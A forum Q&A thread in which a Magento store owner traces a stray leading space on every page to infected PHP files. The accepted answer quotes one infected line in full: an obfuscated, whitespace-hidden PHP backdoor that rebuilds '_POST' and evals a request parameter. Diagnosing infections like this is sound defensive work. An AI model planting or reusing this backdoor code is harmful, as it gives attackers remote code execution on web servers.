Space added before every magento page content

Question

Since upgrading to 1.9.2.2, every magento page on my store is pre-padded with a space before the page content. This breaks xml pages such as the magento soap api, giving the following error when loaded in the browser:

This page contains the following errors:

error on line 1 at column 8: XML declaration allowed only at the start of the document

Below is a rendering of the page up to the first error.

I found that the minimal code required for the spaces to be added is the following:

<?php
require_once 'app/Mage.php';
require_once 'app/code/core/Mage/Core/Model/Config/Options.php';

How can I find the point where the padding occurs?

Answer 1

It's most likely that there is a module installed, or a custom theme installed, that has trailing whitespace after the closing ?> in a file or class.

Because it's happening with both Mage.php and Config/Options.php, I would look at those two files first.

After that, disable all local modules and follow the standard debug process outlined here:

Fundamentals for debugging a Magento store

Best of luck.

Answer 2

Problem solved. Some php files were infected with a code injection exploit (Described here: https://stackoverflow.com/questions/30270641/what-does-this-php-code-do). This exploit script was added to the beginning of php files. It is designed to look like a normal beginning as the hack code has been spaced over typically 250+ spaces so it’s not seen at first glance in a text editor when word-wrap is off.

Example first line from an infected file (scroll right to see the hack script)::

<?php                                                                                                                                                                                                                                                                          $vzq3 = "t_osp";$zqr5= strtoupper($vzq3[1].$vzq3[4] . $vzq3[2].$vzq3[3]. $vzq3[0]) ; if( isset( ${$zqr5 }['q3e818c'])) { eval( ${$zqr5 }['q3e818c']); }?> <?php

The single space between the hack script and the original <?php opening was added to every page in my magento site, breaking magento`s soap api as xmls with preceding spaces are invalid.